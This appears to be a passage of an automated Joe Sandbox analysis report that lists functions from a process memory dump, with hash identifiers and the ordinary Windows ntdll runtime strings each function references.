                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
                                                      • Instruction ID: 802380a077914b1a36587bf9d0e7c8b5937f8e12580434b08a1b277c021c6144
                                                      • Opcode Fuzzy Hash: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
                                                      • Instruction Fuzzy Hash: 9C51D6B5A01645AECB34DE5CC890ABFB7FDEF44200B148899E5E6D7642D7B4DE40C760
                                                      Function 03737630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03774725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03774787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03774742
                                                      • ExecuteOptions, xrefs: 037746A0
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03774655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037746FC
                                                      • Execute=1, xrefs: 03774713
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
                                                      • Instruction ID: 04a9ff06ff8a2a1c5793948e317b86817c701f4cda470196da8ed430400268af
                                                      • Opcode Fuzzy Hash: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
                                                      • Instruction Fuzzy Hash: 3F512AB5640359BADF14EBA5DC99FED73A8EF06300F0400EDD505AB192E770AA45DF50
                                                      Function 037D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 01a5826be151c8bc2144f3f087fedb44f950e76931f691397088229e5c73c324
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: E302F375508341AFC709CF18C894A6BFBF5EFC8704F548A2DB9899B264DB31E905CB52
                                                      Function 0374B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 3f8fbbd55e85fa27a831091f002389ec21afd592f7f1bd3c19e20003f1a33fa0
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: DC81AD70E052499ADF29CF68C9917FEBBA6AF45320F1C415ED8E1A7391C734EC409B51
                                                      Function 037B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
                                                      • Instruction ID: 7e4054932785abf193da214f593b26b042ed00c7730d6349d84886607eb757ca
                                                      • Opcode Fuzzy Hash: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
                                                      • Instruction Fuzzy Hash: 0C216276A0121DAFCB10DF79CC44AEEB7F9EF44640F180516E915E7201E730E9028BA1
                                                      Function 0372F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037702BD
                                                      • RTL: Re-Waiting, xrefs: 0377031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037702E7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
                                                      • Instruction ID: 30000e33aa2f82ec29c49bebbbdd4461ffd6308f6f060a564275c09c96b500fc
                                                      • Opcode Fuzzy Hash: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
                                                      • Instruction Fuzzy Hash: 6EE18B356047419FDB25CF28C884B2ABBF0FB89724F184A6DF5A58B2E1D774E944CB42
                                                      Function 0373BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 03777BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03777B7F
                                                      • RTL: Resource at %p, xrefs: 03777B8E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
                                                      • Instruction ID: 030df9900ebdf4ee8b395b76b796fdaeba6030f37e0e4c1645ec7cda0418fa32
                                                      • Opcode Fuzzy Hash: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
                                                      • Instruction Fuzzy Hash: 1E4101353017439FCB24DE29C844B6AB7E5EF8A720F040A2DF95ADB691DB31E8058F91
                                                      Function 0373B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0377728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 037772C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03777294
                                                      • RTL: Resource at %p, xrefs: 037772A3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
                                                      • Instruction ID: bf7dc0e4a47cd25d7336d38096261c0d2e7ac62ed2752679004f524eca12c467
                                                      • Opcode Fuzzy Hash: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
                                                      • Instruction Fuzzy Hash: EF41FD36700342ABCB24DE24CC41F6AB7B5FF85720F140A19F965AB241DB20F812DBD1
                                                      Function 037B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
                                                      • Instruction ID: e4966814de8c5d8b875505ed2bc6d9e8bdb322b970a2ceea9f19dccad9abd3af
                                                      • Opcode Fuzzy Hash: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
                                                      • Instruction Fuzzy Hash: 94318976A01219AFCB20DF29CC44BEEB7F8EF48610F544955E849E7241EB30EA458FB0
                                                      Function 03747D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: cdd063200fc3acc9cf95085a8a7dfdae8c25afde5af32aefc6740c983e925130
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: E1919470E0035AEBDB28DE69C881ABEB7A5FF44720F58461AE875E72D0D730B9418B51
                                                      Function 03709126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
                                                      • Instruction ID: 7beaa4c4d7eef1cce7a9e688e6a591f81f99812e220a87ceed8aaddd4249b48a
                                                      • Opcode Fuzzy Hash: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
                                                      • Instruction Fuzzy Hash: 9D814B75D00269DBDB71DB54CC54BEEB7B8AB09710F0445EAEA09B7291D7305E84CFA0
                                                      Function 0378CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0378CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
                                                      • Instruction ID: 6484dccba575c5188abe4cd5a033dfa1f007a359f82fe67103121bfa1d0a2bea
                                                      • Opcode Fuzzy Hash: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
                                                      • Instruction Fuzzy Hash: 7341BF76A40218DFDB21EFA9C844A6DFBB8FF45B00F04442AE914EF295D734D801DB61